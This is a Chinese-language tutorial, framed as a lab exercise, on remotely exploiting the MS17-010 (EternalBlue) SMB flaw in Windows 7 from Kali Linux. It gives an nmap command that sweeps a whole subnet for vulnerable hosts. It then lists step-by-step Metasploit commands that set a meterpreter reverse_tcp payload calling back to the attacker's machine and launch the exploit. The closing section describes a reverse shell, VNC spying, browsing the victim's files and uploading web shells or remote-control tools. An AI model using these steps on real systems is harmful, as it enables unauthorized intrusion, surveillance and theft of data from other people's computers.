6.kali linux进行ms17_010远程渗透

备注：

    该实验室尽量攻击windows7平台，windows10系列的平台无法攻击，估计已经修复了漏洞。

      教程中 kali linux msf模块须更新至最新版本或者在其他网站下载ms17_010模块

 

MSF是Metasploit的简称，Metasploit是一款开源的安全漏洞检测工具，非常强大，分别有Windows版和Linux版，工具里集成了许多微软公布的漏洞(0day)。

实验步骤：

一.打开虚拟机平台VMwareWorkstation Pro，在该平台内启动kali linux系统，然后在该系统内启用nmap 7.13 版本 调用nmap自带的参数nmap --script smb-vuln-ms17-010来进行判断和扫描，通过nmap数据返回的结果就能看出该ip段内有多少ip存在漏洞，使用namp的同时你要清楚你需要扫描的IP，可以设置单独的IP也可也设置整个ip网段。

假设攻击目标：192.168.1.105

本机ip：192.168.1.104

代码：nmap -n -p445 --script smb-vuln-ms17-010 192.168.1.0/24 –open

二、NMap的安装

登录nmap官网的下载地址。地址为http:nmap.org/download.html#windows。出于软件安全起见，请尽量去官网下载软件。

三、漏洞利用打开kali linux内自带的msf 渗透测试平台，通过利用msf平台攻击库里面关于ms17_010漏洞的攻击模块进行攻击

msfconsole# 进入MSF 框架

version # 确保MSF框架版本在 4.14.17以上；

search ms17_010 # 漏洞模块路径查询

use exploit/windows/smb/ms17_010_eternalblue

# 调用攻击模块

set RHOST 192.168.1.105 # 设定攻击目标

set payload windows/x64/meterpreter/reverse_tcp

set LHOST 192.168.1.104#设定监听地址

解释：以前的MSF老版本是用msfpayload生成木马 现在在新版本中都用msfvenom代替了，所以有些同学在终端输入msfpayload的时候 会提示

msfpayload无法找到命令 所以使用msfvenom即可

 

exploit# 发起攻击

四、获取shell连接成功后 进入meterpreter 可以使用run vnc 进行远程监视输入shell 反弹shell界面即可查看计算机里所包含的文件等内容也可远程上传一句话 远控等文件即可进行远程操控